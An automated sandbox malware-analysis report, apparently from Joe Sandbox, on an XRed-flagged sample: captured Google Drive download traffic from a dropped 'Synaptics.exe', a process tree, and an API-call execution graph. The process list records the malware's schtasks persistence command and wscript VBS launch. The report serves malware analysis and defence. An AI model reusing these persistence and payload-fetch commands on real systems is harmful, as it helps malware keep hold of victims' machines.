                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.5 | 50066 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:58 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:58 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-oAqwIHIuIcSP9TKS6tsTgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close



                                                                                                                                      Target ID:0
                                                                                                                                      Start time:05:22:55
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\Desktop\222.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\222.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:1'723'904 bytes
                                                                                                                                      MD5 hash:71386F37F17778126296CA734975DB6D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:05:22:55
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\Desktop\._cache_222.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\._cache_222.exe"
                                                                                                                                      Imagebase:0x760000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:05:22:56
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:771'584 bytes
                                                                                                                                      MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:05:22:57
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                      Imagebase:0xab0000
                                                                                                                                      File size:53'161'064 bytes
                                                                                                                                      MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:05:22:58
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                                                                                                                                      Imagebase:0x790000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:05:22:58
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:05:22:58
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs
                                                                                                                                      Imagebase:0x880000
                                                                                                                                      File size:147'456 bytes
                                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3263095777.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3264154997.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:05:22:58
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1
                                                                                                                                      Imagebase:0xd00000
                                                                                                                                      File size:187'904 bytes
                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:05:22:59
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 55%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:05:23:09
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:05:23:18
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:771'584 bytes
                                                                                                                                      MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:05:23:26
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:05:23:35
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe"
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:05:23:43
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 10496
                                                                                                                                      Imagebase:0xf0000
                                                                                                                                      File size:483'680 bytes
                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:21
                                                                                                                                      Start time:05:24:01
                                                                                                                                      Start date:30/12/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe
                                                                                                                                      Imagebase:0x440000
                                                                                                                                      File size:952'320 bytes
                                                                                                                                      MD5 hash:36F4C5372C6391F782C2DB490081746F
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true


                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:4.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:10.7%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:40
76d3d2 48 API calls 104953->104954 104955 7c354a 104954->104955 104956 76d3d2 48 API calls 104955->104956 104957 7c3553 104956->104957 104958 76d3d2 48 API calls 104957->104958 104959 7c355c 104958->104959 104960 7684a6 81 API calls 104959->104960 104968 7c35e9 Mailbox 104959->104968 104961 7c3580 104960->104961 105541 7c3d7b 104961->105541 104968->104606 105042 7b95e0 105041->105042 105042->104606 105043->104605 105044->104606 105045->104875 105046->104869 105047->104878 105048->104878 105051 7a6d8a __wsetenvp 105049->105051 105050 7a6db3 GetFileAttributesW 105052 7a6dc5 GetLastError 105050->105052 105060 7a6de3 105050->105060 105051->105050 105053 7a6dd0 CreateDirectoryW 105052->105053 105054 7a6de7 105052->105054 105053->105054 105053->105060 105055 763bcf 48 API calls 105054->105055 105054->105060 105056 7a6df7 _wcsrchr 105055->105056 105057 7a6d6d 48 API calls 105056->105057 105056->105060 105058 7a6e1b 105057->105058 105059 7a6e28 CreateDirectoryW 105058->105059 105058->105060 105059->105060 105060->104885 105062 767e53 48 API calls 105061->105062 105063 7a78df 105062->105063 105080 77e617 105063->105080 105066 7b267a 105067 7b26a4 __wsetenvp 105066->105067 105068 7af039 105067->105068 105069 7b26d8 105067->105069 105071 7b2763 105067->105071 105068->104896 105073 7639e8 48 API calls 2 library calls 105068->105073 105069->105068 105084 77dfd2 60 API calls 105069->105084 105071->105068 105085 77dfd2 60 API calls 105071->105085 105073->104896 105081 77e625 105080->105081 105082 76a2fb 48 API calls 105081->105082 105083 77e635 105082->105083 105083->105066 105084->105069 105085->105071 105088 7b2306 105087->105088 105089 7b230a 105088->105089 105090 7b2365 105088->105090 105091 78010a 48 API calls 105089->105091 105156 77f0f3 48 API calls 105090->105156 105093 7b2311 105091->105093 105094 7b231f 105093->105094 105143 765080 49 API calls 105093->105143 105096 7684a6 81 API calls 105094->105096 105098 7b2331 105096->105098 105097 7b2379 105099 7b234d 
105097->105099 105101 7b243f 105097->105101 105103 7b23bb 105097->105103 105144 764bf9 105098->105144 105099->104925 105159 7abe47 105101->105159 105107 7684a6 81 API calls 105103->105107 105105 7b2446 105163 7a689f SetFilePointerEx SetFilePointerEx WriteFile 105105->105163 105106 7b2341 105106->105099 105155 764592 CloseHandle 105106->105155 105114 7b23c2 105107->105114 105109 7b23f6 105125 7a67dc 105109->105125 105112 7b2400 105157 767b6e 48 API calls 105112->105157 105114->105109 105114->105112 105115 7b2410 105116 76c935 48 API calls 105115->105116 105117 7b241a 105116->105117 105158 7639e8 48 API calls 2 library calls 105117->105158 105119 7b23fe Mailbox 105119->105099 105121 7650ec CloseHandle 105119->105121 105120 7b2428 105122 7a67dc 55 API calls 105120->105122 105123 7b2490 105121->105123 105122->105119 105164 764592 CloseHandle 105123->105164 105126 7a67ec 105125->105126 105127 7a67f6 105125->105127 105181 7a6917 SetFilePointerEx SetFilePointerEx WriteFile 105126->105181 105129 7a6808 105127->105129 105130 7a67fc 105127->105130 105132 7a6811 105129->105132 105133 7a6824 105129->105133 105182 7a68b9 51 API calls 105130->105182 105135 76a6d4 48 API calls 105132->105135 105165 76a6d4 105133->105165 105134 7a67f4 Mailbox 105134->105119 105137 7a6816 105135->105137 105183 7a66f8 50 API calls 105137->105183 105141 7a6822 105143->105094 105145 7650ec CloseHandle 105144->105145 105146 764c04 105145->105146 105221 764b88 105146->105221 105149 764c44 105149->105097 105149->105106 105155->105099 105156->105097 105157->105115 105158->105120 105160 7abe50 105159->105160 105162 7abe55 105159->105162 105275 7aae06 50 API calls 2 library calls 105160->105275 105162->105105 105163->105119 105164->105099 105166 78010a 48 API calls 105165->105166 105167 76a6e7 105166->105167 105168 76a6f8 48 API calls 105167->105168 105169 76a6f4 105168->105169 105181->105134 105182->105134 105183->105141 105222 764ba1 CreateFileW 105221->105222 105223 7d4957 105221->105223 105224 764bc3 
105222->105224 105223->105224 105225 7d495d CreateFileW 105223->105225 105224->105149 105228 764df0 105224->105228 105225->105224 105226 7d4983 105225->105226 105250 764ee9 105226->105250 105229 764e10 105228->105229 105230 764ee9 2 API calls 105229->105230 105237 764e69 105229->105237 105238 764ebd 105229->105238 105231 764e48 105230->105231 105257 764f03 105250->105257 105275->105162 105277 76e216 105276->105277 105337 76e226 Mailbox 105276->105337 105278 76e670 105277->105278 105277->105337 105406 77ecee 415 API calls 105278->105406 105280 76e4fd 105280->104606 105282 76e681 105282->105280 105284 76e68e 105282->105284 105283 76e26c PeekMessageW 105283->105337 105408 77ec33 415 API calls Mailbox 105284->105408 105286 7d5b13 Sleep 105286->105337 105287 76e695 LockWindowUpdate DestroyWindow GetMessageW 105287->105280 105290 76e6c7 105287->105290 105288 76e4e7 105288->105280 105407 76322e 16 API calls 105288->105407 105292 7d62a7 TranslateMessage DispatchMessageW GetMessageW 105290->105292 105292->105292 105293 7d62d7 105292->105293 105293->105280 105294 76e657 PeekMessageW 105294->105337 105295 78010a 48 API calls 105295->105337 105296 76e517 timeGetTime 105296->105337 105298 76c935 48 API calls 105298->105337 105299 76e641 TranslateMessage DispatchMessageW 105299->105294 105300 7d5dfc WaitForSingleObject 105302 7d5e19 GetExitCodeProcess CloseHandle 105300->105302 105300->105337 105301 7d6147 Sleep 105333 7d5cce Mailbox 105301->105333 105302->105337 105303 76d3d2 48 API calls 105303->105333 105304 76e6cc timeGetTime 105409 77cf79 49 API calls 105304->105409 105306 7d5feb Sleep 105306->105337 105310 761000 391 API calls 105310->105337 105312 7d61de GetExitCodeProcess 105315 7d620a CloseHandle 105312->105315 105316 7d61f4 WaitForSingleObject 105312->105316 105314 7d5cea Sleep 105314->105337 105315->105333 105316->105315 105316->105337 105317 7d5cd7 Sleep 105317->105314 105318 7c8a48 108 API calls 105318->105333 105320 761dce 107 API calls 105320->105337 105321 7d6266 
Sleep 105321->105337 105322 77cf79 49 API calls 105322->105337 105325 76caee 48 API calls 105325->105333 105327 76fa40 391 API calls 105327->105337 105330 7744e0 391 API calls 105330->105337 105331 773680 391 API calls 105331->105337 105332 76caee 48 API calls 105332->105337 105333->105303 105333->105312 105333->105314 105333->105317 105333->105318 105333->105321 105333->105325 105333->105337 105411 7a56dc 49 API calls Mailbox 105333->105411 105412 77cf79 49 API calls 105333->105412 105413 76d380 105333->105413 105417 761000 415 API calls 105333->105417 105419 7bd12a 50 API calls 105333->105419 105420 7a8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105333->105420 105421 77e3a5 timeGetTime 105333->105421 105422 7a6f5b CreateToolhelp32Snapshot Process32FirstW 105333->105422 105335 7ad520 86 API calls 105335->105337 105336 76d380 55 API calls 105336->105337 105337->105283 105337->105286 105337->105288 105337->105294 105337->105295 105337->105296 105337->105298 105337->105299 105337->105300 105337->105301 105337->105304 105337->105306 105337->105310 105337->105314 105337->105320 105337->105322 105337->105327 105337->105330 105337->105331 105337->105332 105337->105333 105337->105335 105337->105336 105338 76e7e0 105337->105338 105345 76ea00 105337->105345 105395 77f381 105337->105395 105400 77ed1a 105337->105400 105405 76e7b0 415 API calls Mailbox 105337->105405 105410 7c8b20 48 API calls 105337->105410 105418 77e3a5 timeGetTime 105337->105418 105339 76e7fd 105338->105339 105341 76e80f 105338->105341 105429 76dcd0 105339->105429 105460 7ad520 86 API calls 4 library calls 105341->105460 105342 76e806 105342->105337 105344 7d98e8 105344->105344 105346 76ea20 105345->105346 105347 76fa40 415 API calls 105346->105347 105349 76ea89 105346->105349 105350 7d9919 105347->105350 105348 7d99bc 105475 7ad520 86 API calls 4 library calls 105348->105475 105354 76d3d2 48 API calls 105349->105354 105375 76eb18 105349->105375 105377 76ecd7 
Mailbox 105349->105377 105350->105349 105472 7ad520 86 API calls 4 library calls 105350->105472 105353 76d3d2 48 API calls 105355 7d9997 105353->105355 105356 7d9963 105354->105356 105474 781b2a 52 API calls __cinit 105355->105474 105473 781b2a 52 API calls __cinit 105356->105473 105359 7d9d70 105484 7be2fb 415 API calls Mailbox 105359->105484 105361 76d380 55 API calls 105361->105377 105362 7d9dc2 105486 7ad520 86 API calls 4 library calls 105362->105486 105363 7d9ddf 105487 7bc235 415 API calls Mailbox 105363->105487 105365 76fa40 415 API calls 105365->105377 105366 76342c 48 API calls 105366->105377 105367 7d9e49 105489 7ad520 86 API calls 4 library calls 105367->105489 105370 7714a0 48 API calls 105370->105377 105374 7d9df7 105394 76ef0c Mailbox 105374->105394 105488 7ad520 86 API calls 4 library calls 105374->105488 105375->105353 105375->105377 105377->105348 105377->105359 105377->105361 105377->105362 105377->105363 105377->105365 105377->105366 105377->105367 105377->105370 105378 76f56f 105377->105378 105381 7ad520 86 API calls 105377->105381 105382 7d9a3c 105377->105382 105377->105394 105468 76d805 105377->105468 105476 7aa3ee 48 API calls 105377->105476 105477 7bede9 415 API calls 105377->105477 105482 79a599 InterlockedDecrement 105377->105482 105483 7bf4df 415 API calls 105377->105483 105378->105394 105485 7ad520 86 API calls 4 library calls 105378->105485 105381->105377 105478 7bd154 48 API calls 105382->105478 105384 7d9a48 105386 7d9a56 105384->105386 105387 7d9a9b 105384->105387 105479 7aa485 48 API calls 105386->105479 105390 7d9a91 Mailbox 105387->105390 105480 7aafce 48 API calls 105387->105480 105388 76fa40 415 API calls 105388->105394 105390->105388 105392 7d9ad8 105394->105337 105396 77f390 105395->105396 105398 7dee11 105395->105398 105396->105337 105397 7dee46 105398->105397 105399 7dee28 TranslateAcceleratorW 105398->105399 105399->105396 105401 77ed2c 105400->105401 105403 77ed34 105400->105403 105401->105337 105402 77ed5e 
IsDialogMessageW 105402->105401 105402->105403 105403->105401 105403->105402 105404 7debec GetClassLongW 105403->105404 105404->105402 105404->105403 105405->105337 105406->105288 105407->105282 105408->105287 105409->105337 105410->105337 105411->105333 105412->105333 105414 76d38b 105413->105414 105415 76d3b4 105414->105415 105490 76d772 55 API calls 105414->105490 105415->105333 105417->105333 105418->105337 105419->105333 105420->105333 105421->105333 105491 7a79c2 105422->105491 105424 7a7021 CloseHandle 105424->105333 105425 7a6fa4 Process32NextW 105425->105424 105427 7a6fa0 _wcscat 105425->105427 105427->105424 105427->105425 105497 78297d 105427->105497 105500 781bc7 105427->105500 105430 76fa40 415 API calls 105429->105430 105434 76dd0f _memmove 105430->105434 105432 7d8ddc 105432->105432 105433 76dd70 105433->105342 105434->105433 105435 76e12b Mailbox 105434->105435 105442 7d8dbe 105434->105442 105444 78010a 48 API calls 105434->105444 105446 76deb7 105434->105446 105455 76df29 105434->105455 105437 78010a 48 API calls 105435->105437 105436 76e051 105438 76e066 105436->105438 105439 7d8daf 105436->105439 105443 76decb _memmove 105437->105443 105440 78010a 48 API calls 105438->105440 105466 7bd1da 50 API calls 105439->105466 105453 76df64 105440->105453 105467 7ad520 86 API calls 4 library calls 105442->105467 105445 76def6 105443->105445 105447 78010a 48 API calls 105443->105447 105443->105455 105444->105434 105445->105455 105461 774320 415 API calls 105445->105461 105446->105435 105448 76dec4 105446->105448 105447->105445 105449 78010a 48 API calls 105448->105449 105449->105443 105450 7d8d9e 105465 7ad520 86 API calls 4 library calls 105450->105465 105453->105342 105455->105436 105455->105450 105455->105453 105456 7d8d76 105455->105456 105458 7d8d51 105455->105458 105462 765322 415 API calls 105455->105462 105464 7ad520 86 API calls 4 library calls 105456->105464 105463 7ad520 86 API calls 4 library calls 105458->105463 105460->105344 105461->105455 
105462->105455 105463->105453 105464->105453 105465->105453 105466->105442 105467->105432 105469 76d828 _memmove 105468->105469 105470 76d815 105468->105470 105469->105377 105470->105469 105471 78010a 48 API calls 105470->105471 105471->105469 105472->105349 105473->105375 105474->105377 105475->105394 105476->105377 105477->105377 105478->105384 105479->105390 105480->105392 105482->105377 105483->105377 105484->105378 105485->105394 105486->105394 105487->105374 105488->105394 105489->105394 105490->105415 105492 7a79e9 105491->105492 105493 7a79d0 105491->105493 105511 78224a 58 API calls __wcstoi64 105492->105511 105493->105492 105496 7a79ef 105493->105496 105510 7822df GetStringTypeW wcstoxq 105493->105510 105496->105427 105512 7829c7 105497->105512 105501 781c48 105500->105501 105502 781bd3 105500->105502 105540 781c5a 59 API calls 3 library calls 105501->105540 105508 781bf8 105502->105508 105538 78889e 47 API calls __getptd_noexit 105502->105538 105505 781c55 105505->105427 105506 781bdf 105508->105427 105510->105493 105511->105496 105513 7829e2 105512->105513 105516 7829d6 105512->105516 105536 78889e 47 API calls __getptd_noexit 105513->105536 105515 782b9a 105516->105513 105519 782a55 105516->105519 105531 78a9fb 47 API calls __cftof2_l 105516->105531 105519->105513 105531->105519 105536->105515 105538->105506 105540->105505 105542 76c4cd 48 API calls 105541->105542 105543 7c3d89 105542->105543 105544 76c4cd 48 API calls 105543->105544 105545 7c3d91 105544->105545 105546 76c4cd 48 API calls 105545->105546 105547 7c3d99 105546->105547 105548 7c3e01 105547->105548 105588 76a4f6 105547->105588 105550 76c4cd 48 API calls 105548->105550 105554 7c3dff 105550->105554 105589 76b8a7 48 API calls 105588->105589 105599 76a9af 105598->105599 105602 76a9ca 105598->105602 105600 76b8a7 48 API calls 105599->105600 105601 76a9b7 CharUpperBuffW 105600->105601 105601->105602 105602->104626 105604 7d4c5a 105603->105604 105605 7610f9 105603->105605 105606 78010a 48 API 
